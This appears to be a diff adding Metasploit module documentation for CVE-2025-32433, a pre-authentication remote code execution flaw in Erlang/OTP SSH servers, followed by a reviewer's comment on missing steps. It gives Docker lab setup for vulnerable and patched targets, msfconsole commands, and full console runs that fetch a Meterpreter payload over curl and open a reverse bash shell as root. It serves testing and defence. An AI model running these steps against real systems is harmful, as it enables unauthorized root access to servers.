| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Erlang/OTP is a set of libraries for the Erlang programming language. |
| 4 | + |
| 5 | +Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker |
| 6 | +to perform unauthenticated remote code execution (RCE). |
| 7 | + |
| 8 | +By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access |
| 9 | +to affected systems and execute arbitrary commands without valid credentials. This issue is patched in |
| 10 | +versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. |
| 11 | + |
| 12 | +### Introduction |
| 13 | + |
| 14 | +This module detect and exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH |
| 15 | +servers that allows remote command execution. By sending crafted SSH packets, it executes a payload to |
| 16 | +establish a reverse shell on the target system. |
| 17 | + |
| 18 | +The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd` |
| 19 | +function without requiring authentication. |
| 20 | + |
| 21 | +## Testing |
| 22 | + |
| 23 | +### Vulnerable application |
| 24 | + |
| 25 | +Execute the following commands: |
| 26 | + |
| 27 | +```bash |
| 28 | +git clone https://github.com/ProDefense/CVE-2025-32433 |
| 29 | +cd CVE-2025-32433 |
| 30 | +docker build -t cve-ssh:latest . |
| 31 | +docker run -d -p 2222:2222 cve-ssh:latest |
| 32 | +``` |
| 33 | + |
| 34 | +### Patched application |
| 35 | + |
| 36 | +Execute the following commands: |
| 37 | + |
| 38 | +```bash |
| 39 | +git clone https://github.com/exa-offsec/ssh_erlangotp_rce |
| 40 | +cd ssh_erlangotp_rce/patched |
| 41 | +docker build -t patched-ssh:latest . |
| 42 | +docker run -d -p 2223:2223 patched-ssh:latest |
| 43 | +``` |
| 44 | + |
| 45 | +## Verification Steps |
| 46 | + |
| 47 | +1. Start msfconsole |
| 48 | +2. Do: `use exploit/linux/ssh/ssh_erlangotp_rce` |
| 49 | +3. Do: `set RHOSTS [IP]` |
| 50 | +4. Do: `run` |
| 51 | + |
| 52 | +## Scenarios |
| 53 | + |
| 54 | +### Using linux commands (Target 0) |
| 55 | + |
| 56 | +Use the linux commands CMD. |
| 57 | + |
| 58 | +``` |
| 59 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options |
| 60 | +
|
| 61 | +Module options (exploit/linux/ssh/ssh_erlangotp_rce): |
| 62 | +
|
| 63 | + Name Current Setting Required Description |
| 64 | + ---- --------------- -------- ----------- |
| 65 | + RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 66 | + RPORT 2222 yes The target port (TCP) |
| 67 | + SSH_IDENT SSH-2.0-OpenSSH_8.9 yes SSH client identification string sent to the server |
| 68 | +
|
| 69 | +Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp): |
| 70 | +
|
| 71 | + Name Current Setting Required Description |
| 72 | + ---- --------------- -------- ----------- |
| 73 | + FETCH_CHECK_CERT false yes Check SSL certificate |
| 74 | + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) |
| 75 | + FETCH_DELETE false yes Attempt to delete the binary after execution |
| 76 | + FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only |
| 77 | + FETCH_SRVHOST no Local IP to use for serving payload |
| 78 | + FETCH_SRVPORT 8080 yes Local port to use for serving payload |
| 79 | + FETCH_URIPATH no Local URI to use for serving payload |
| 80 | + LHOST 192.168.0.1 yes The listen address (an interface may be specified) |
| 81 | + LPORT 4444 yes The listen port |
| 82 | +
|
| 83 | + When FETCH_FILELESS is false: |
| 84 | +
|
| 85 | + Name Current Setting Required Description |
| 86 | + ---- --------------- -------- ----------- |
| 87 | + FETCH_FILENAME tVzpeXtmX no Name to use on remote system when storing payload; cannot contain spaces or slashes |
| 88 | + FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces |
| 89 | +
|
| 90 | +Exploit target: |
| 91 | +
|
| 92 | + Id Name |
| 93 | + -- ---- |
| 94 | + 0 Linux Command |
| 95 | +
|
| 96 | +View the full module info with the info, or info -d command. |
| 97 | +
|
| 98 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run |
| 99 | +[*] Started reverse TCP handler on 192.168.0.1:4444 |
| 100 | +[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable) |
| 101 | +[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433 |
| 102 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 103 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 104 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 105 | +[+] 192.168.0.1:2222 - The target is vulnerable. |
| 106 | +[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433 |
| 107 | +[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7 |
| 108 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 109 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 110 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 111 | +[+] 192.168.0.1:2222 - Payload sent successfully |
| 112 | +[*] Sending stage (3045380 bytes) to 172.17.0.2 |
| 113 | +[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 172.17.0.2:35770) at 2025-04-27 20:23:02 +0400 |
| 114 | +
|
| 115 | +meterpreter > |
| 116 | +``` |
| 117 | + |
| 118 | +### Using unix commands (Target 1) |
| 119 | + |
| 120 | +Use the unix commands CMD. |
| 121 | + |
| 122 | +``` |
| 123 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options |
| 124 | +
|
| 125 | +Module options (exploit/linux/ssh/ssh_erlangotp_rce): |
| 126 | +
|
| 127 | + Name Current Setting Required Description |
| 128 | + ---- --------------- -------- ----------- |
| 129 | + RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 130 | + RPORT 2222 yes The target port (TCP) |
| 131 | + SSH_IDENT SSH-2.0-OpenSSH_8.9 yes SSH client identification string sent to the server |
| 132 | +
|
| 133 | +Payload options (cmd/unix/reverse_bash): |
| 134 | +
|
| 135 | + Name Current Setting Required Description |
| 136 | + ---- --------------- -------- ----------- |
| 137 | + LHOST 192.168.0.1 yes The listen address (an interface may be specified) |
| 138 | + LPORT 4444 yes The listen port |
| 139 | +
|
| 140 | +Exploit target: |
| 141 | +
|
| 142 | + Id Name |
| 143 | + -- ---- |
| 144 | + 1 Unix Command |
| 145 | +
|
| 146 | +View the full module info with the info, or info -d command. |
| 147 | +
|
| 148 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run |
| 149 | +[*] Started reverse TCP handler on 192.168.0.1:4444 |
| 150 | +[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable) |
| 151 | +[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433 |
| 152 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 153 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 154 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 155 | +[+] 192.168.0.1:2222 - The target is vulnerable. |
| 156 | +[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433 |
| 157 | +[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7 |
| 158 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 159 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 160 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 161 | +[+] 192.168.0.1:2222 - Payload sent successfully |
| 162 | +[*] Command shell session 1 opened (192.168.0.1:4444 -> 172.17.0.2:59042) at 2025-04-27 20:24:41 +0400 |
| 163 | +
|
| 164 | +whoami |
| 165 | +root |
| 166 | +``` |
| 167 | + |
| 168 | +## References |
| 169 | + |
| 170 | +1. <https://x.com/Horizon3Attack/status/1912945580902334793> |
| 171 | +2. <https://platformsecurity.com/blog/CVE-2025-32433-poc> |
| 172 | +3. <https://github.com/ProDefense/CVE-2025-32433> |
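Review bot: the Verification Steps (steps 1 to 4) leave out options the Scenarios sections depend on: both payloads shown are reverse shells with `LHOST` marked required, the Unix Command scenario needs `set target 1` (step 4 as written only exercises Target 0), and the Patched application container listens on 2223 while the options output shows `RPORT 2222`, so add `set LHOST [IP]`, `set RPORT [port]` and `set target 1` steps, or state that the defaults are used. The Patched application section also has no accompanying output: a `check` run against the 2223 container showing the module reporting the target as not vulnerable would document that the pre-auth `SSH_MSG_CHANNEL_REQUEST` probe gives no false positive on the fixed OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20 builds, which is the case a defender validating this module cares about most. Minor wording: in the Introduction "This module detect and exploits" should read "This module detects and exploits" and "a SSH server" should be "an SSH server"; "Use the linux commands CMD." and "Use the unix commands CMD." would be clearer as sentences naming the payload family shown in the options output (`cmd/linux/https/x64/meterpreter/reverse_tcp` for Target 0, `cmd/unix/reverse_bash` for Target 1).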